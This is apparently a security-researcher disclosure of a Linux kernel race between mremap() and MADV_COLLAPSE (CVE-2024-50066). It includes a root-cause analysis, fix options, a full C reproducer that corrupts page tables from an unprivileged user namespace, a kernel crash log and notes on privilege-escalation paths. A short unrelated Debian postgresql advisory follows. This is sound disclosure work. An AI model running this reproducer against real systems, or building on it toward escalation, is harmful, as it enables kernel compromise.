MADVISE_COLLAPSEDescriptionIn mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, ...) is called, which first takes rmap locks, then does move_normal_pmd().move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:        /* Clear the pmd */        pmd = *old_pmd;        pmd_clear(old_pmd);        VM_BUG_ON(!pmd_none(*new_pmd));        pmd_populate(mm, new_pmd, pmd_pgtable(pmd));        flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);The problem is: The rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same tmpfs file that is stored on a tmpfs mount with huge=advise):process A                      process B=========                      =========mremap  mremap_to    move_vma      move_page_tables        get_old_pmd        alloc_new_pmd                      *** PREEMPT ***                               madvise(MADV_COLLAPSE)                                 do_madvise                                   madvise_walk_vmas                                     madvise_vma_behavior                                       madvise_collapse                                         hpage_collapse_scan_file                                           collapse_file                                             retract_page_tables                                               i_mmap_lock_read(mapping)                                               pmdp_collapse_flush                                               i_mmap_unlock_read(mapping)        move_pgt_entry(NORMAL_PMD, ...)          take_rmap_locks          move_normal_pmd          drop_rmap_locksIn this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:pmd_populate(mm, new_pmd, pmd_pgtable(pmd));runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the X86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address - so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.So this ends up installing physical address 0 as a page table.Fixing itI guess there are two ways we could fix this:    Hold the rmap locks much more broadly in move_page_tables(). In particular, take them before inspecting the source pmd, and if we do a PMD-level move, keep them held throughout the entire move.    Add a bunch of extra recheck/retry logic.I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.I will send a suggested patch for the first option in a minute (and I have tested that with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding of whether this is the right way to patch it, and if yes, whether the patch is doing too little lock-dropping for performance or adds too much complexity with the lock-dropping...ReproducerI made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:#define _GNU_SOURCE#include <err.h>#include <sched.h>#include <stdio.h>#include <string.h>#include <fcntl.h>#include <signal.h>#include <stdlib.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/stat.h>#include <sys/prctl.h>#include <sys/mount.h>#include <sys/mman.h>#include <sys/wait.h>#include <sys/ioctl.h>static void pin_to(int cpu) {  cpu_set_t cset;  CPU_ZERO(&cset);  CPU_SET(cpu, &cset);  if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))    err(1, "set affinity");}#ifndef MADV_COLLAPSE#define MADV_COLLAPSE 25#endif#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})static void write_file(char *name, char *buf) {  int fd = SYSCHK(open(name, O_WRONLY));  if (write(fd, buf, strlen(buf)) != strlen(buf))    err(1, "write %s", name);  close(fd);}static void write_map(char *name, int outer_id) {  char buf[100];  sprintf(buf, "0 %d 1", outer_id);  write_file(name, buf);}int main(void) {  // set up new mount ns for tmpfs with THP  int outer_uid = getuid();  int outer_gid = getgid();  SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));  write_file("/proc/self/setgroups", "deny");  write_map("/proc/self/uid_map", outer_uid);  write_map("/proc/self/gid_map", outer_gid);  // make tmpfs with THP  SYSCHK(mount("none", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "huge=advise"));  pin_to(0);  while (1) {    int fd = SYSCHK(open("/tmp/a", O_RDWR|O_CREAT, 0600));    void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));    SYSCHK(ftruncate(fd, 0x1000));    *((volatile char *)ptr) = 'a';    SYSCHK(ftruncate(fd, 0x200000));    SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));    close(fd);    SYSCHK(unlink("/tmp/a"));    int child = SYSCHK(fork());    if (child == 0) {      for (int i=0; i<512; i++)        ((volatile char *)ptr)[0x1000*i] = 'a';      struct sched_param param = { .sched_priority = 0 };      SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));      /* race (outer side, will be preempted) */      SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));      return 0;    }    for (int i=0; i<512; i++)      ((volatile char *)ptr)[0x1000*i] = 'a';    usleep(10);    /* race (inner side, will preempt after timer and voluntary resched) */    int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);    if (madv_res == -1)      fprintf(stderr, "_");    int wstatus;    SYSCHK(waitpid(child, &wstatus, 0));    SYSCHK(munmap(ptr, 0x200000));    fprintf(stderr, ".");  }}Usage:user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.cuser@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist.................................................................................................................................Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):[  120.427189] BUG: Bad page map in process collapse-vs-mre  pte:f000ff53f000ff53 pmd:00000067[  120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0[  120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0[  120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G        W          6.11.0 #493[  120.433591] Tainted: [W]=WARN[  120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014[  120.435849] Call Trace:[  120.436375]  <TASK>[  120.436843]  dump_stack_lvl+0x53/0x70[  120.437570]  print_bad_pte+0x4e6/0x8e0[...][  120.447625]  vm_normal_page+0x1c8/0x260[...][  120.450162]  unmap_page_range+0x914/0x3d10[...][  120.456954]  unmap_vmas+0x1cc/0x390[...][  120.461123]  exit_mmap+0x160/0x6c0[...][  120.465181]  mmput+0xa0/0x3a0[  120.465793]  do_exit+0x7cd/0x27f0[...][  120.472198]  do_group_exit+0xac/0x230[  120.472916]  __x64_sys_exit_group+0x3e/0x50[  120.473722]  x64_sys_call+0x17f3/0x1800[  120.474469]  do_syscall_64+0x4b/0x110[  120.475189]  entry_SYSCALL_64_after_hwframe+0x76/0x7e[...][  120.489560]  </TASK>On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm's pagetable bytes counter being -4096 on process exit.ImpactReaching this bug requires that you can create shmem/file THP mappings - anonymous THP uses different code that doesn't zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they're not affected.)As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.At that point, I think several bad things can happen that could lead to privilege escalation, though I haven't tested that:    When a PTE is zapped through the page table's first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.    If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and then munmap() VMA 1, you'll end up with an anonymous page that's only mapped into a VMA that is not associated with the page's anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 - but that seems to be the case at least on the two X86 systems I tested this on.Non-issue 2 (no impact): move_ptes vs MADVISE_COLLAPSEmove_ptes() locks the source and destination page tables as follows:        old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);        if (!old_pte)                return -EAGAIN;        new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);        if (!new_pte) {                pte_unmap_unlock(old_pte, old_ptl);                return -EAGAIN;        }        if (new_ptl != old_ptl)                spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_orderThe classic way mremap() used to work is:    We make a new VMA.    We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.    If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.As a comment in move_page_tables() explains:/* * On error, move entries back from new area to old, * which will succeed since page tables still there, * and then proceed to unmap new area instead of old. */However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):    move_vma() calls move_page_tables()    move_page_tables() moves an anonymous huge PMD entry.    move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.    Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).    move_vma() calls move_page_tables() in the reverse direction to move PTEs back.    move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.    do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn't lead to any major consequences.FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, ...), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.CommentsAll commentsja...@google.com <ja...@google.com> #2Oct 15, 2024 11:05AMThe fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.ja...@google.com <ja...@google.com> #3Oct 22, 2024 09:28AMMarked as fixed, reassigned to ja...@google.com.Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa ("mm/mremap: fix move_normal_pmd/retract_page_tables race").In stable releases:    6.6.58 (2024-10-22)    6.11.5 (2024-10-22)Related CVE Number: CVE-2024-50066.Credit: Jann Horn

Linux 6.6 Race Condition

Debian Linux Security Advisory 5812-2 - The postgresql minor release shipped in DSA 5812 introduced an ABI break, which has been reverted so that extensions do not need to be rebuilt.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5812-2                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 21, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : postgresql-15The postgresql minor release shipped in DSA 5812 introduced an ABI break,which has been reverted so that extensions do not need to be rebuilt.For the stable distribution (bookworm), this  has been fixed inversion 15.10-0+deb12u1.We recommend that you upgrade your postgresql-15 packages.For the detailed security status of postgresql-15 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/postgresql-15Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmc/hswACgkQEMKTtsN8TjZePRAAgnIkPa8sI7Rv38Ye9PxPsElOYO5pMMe4Pn8xcqtVtDdYsu/D2n/H7lF5u7Yn3WAjSLYbTi2wc9sPZ2lqg/qgEgGuU0xh4+Bbd2N0eXSWRZMCe9ILIJqdyX0BeF3hjpqmJrkOi1xxIxsvS8nLxXdI4zEJdCd9R+Q2iH8D0Xl3IuRWPFYpOdu4aWSgtqlYrmRtZ6yM/LCM8qnTOf1WZ+L8x7jYHQ21PGYH+645UY3tCEoe4mr3H2e/f0rLVxAJMvFQbbUk/gLVozI4+5cIracmcQMaHR+TqHfkVY8qMq9iASehFF9qhxMJVSP2o0aprYMHyKoIudyzLUuM0fJD0xs2yQjj+wP71mTPe3t4NqBDE4z/oDNgXuehRMmOPeBq3nP7JQG/BhQN/F4bDI3aSu/EPfUwEODiIPapGeYTjnI0RPU6RxgfM1qTLPFAvzFYIyRCPlqmAF/RhFndSnXl2mMsZo/w69CUgKtt04c1nATXGI+VklIV400mHPLFCj+ETF0qESNwGqiUdyxYY2uuTa/KyJ+JzHBTJ9wYEgZErKVdpyVcaB7+0j+Sx15tObwIfhdTths2BOtCl9jp1hLtitwog7486FOVIL4TpXkqk4TfLwD9DiK/KurE/aUlEwDDk9j5F8KA7HqW+e1eAlsqI+P+kHHkSXlVj+DssQRvQywqIN0==pbdM-----END PGP SIGNATURE-----

Tag

#debian